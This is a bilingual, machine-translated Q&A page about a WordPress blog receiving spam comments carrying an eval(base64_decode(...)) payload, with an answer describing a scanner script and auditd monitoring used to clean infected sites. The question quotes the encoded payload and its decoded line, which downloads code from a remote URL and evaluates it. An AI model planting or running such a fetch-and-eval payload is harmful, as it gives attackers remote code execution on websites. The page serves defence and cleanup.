EVAL Base64编码病毒的Word preSS [英] Eval Base64 virus Wordpress
问题描述
我用一个词preSS博客今天我得到了这样的评论。
I'm using a wordpress blog today i got a comment like this .
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
当我使用去codeR我得到过德codeD此评论
When i've decoded this comment using decoder i got
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
我收到很多这样的评论。谁能帮我解决这个问题?它是一个黑客或它表明黑客的开始?
I'm getting many comments like this . Can anyone help me to resolve this problem .? Is it a Hack or does it shows the beginning of hacking ?
推荐答案
的建议没有为我们工作。下面是我们如何删除多个字preSS网站的恶意code无需停机。
None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.
我们遇到了在那里我们有多个旧词preSS站点共享一个文件系统,是由该病毒渗透的问题。
We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.
我们最后写一个小python脚本遍历文件系统我们并检测恶意code。
We ended up writing a little python script to traverse our filesystem and detect the malicious code.
这里的code兴趣的人(注:使用AT风险自负):
https://github.com/michigan-com/eval_scrubber
Here's the code for anyone interested (NOTE: USE AT OWN RISK): https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
这脚本将扫描文件系统中的恶意内容,并作为一个独立的命令,它会尝试删除的base64的eval函数。
That scripts will scan the filesystem for malicious content and as a separate command it will attempt to remove the base64 eval functions.
这确实是一个临时的解决方案,因为这种病毒的生成器使用PHP的意见导致正则表达式不匹配。我们结束了使用 auditd调用
来监视哪些文件被写入我们知道在受感染的文件:的http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd
to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
一旦我们发现的病毒的产生,确实多了一个 eval_scrubber删除
然后我们的问题是固定的。
Once we found the generator of the virus, did one more eval_scrubber remove
and then our problem was fixed.
这篇关于EVAL Base64编码病毒的Word preSS的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!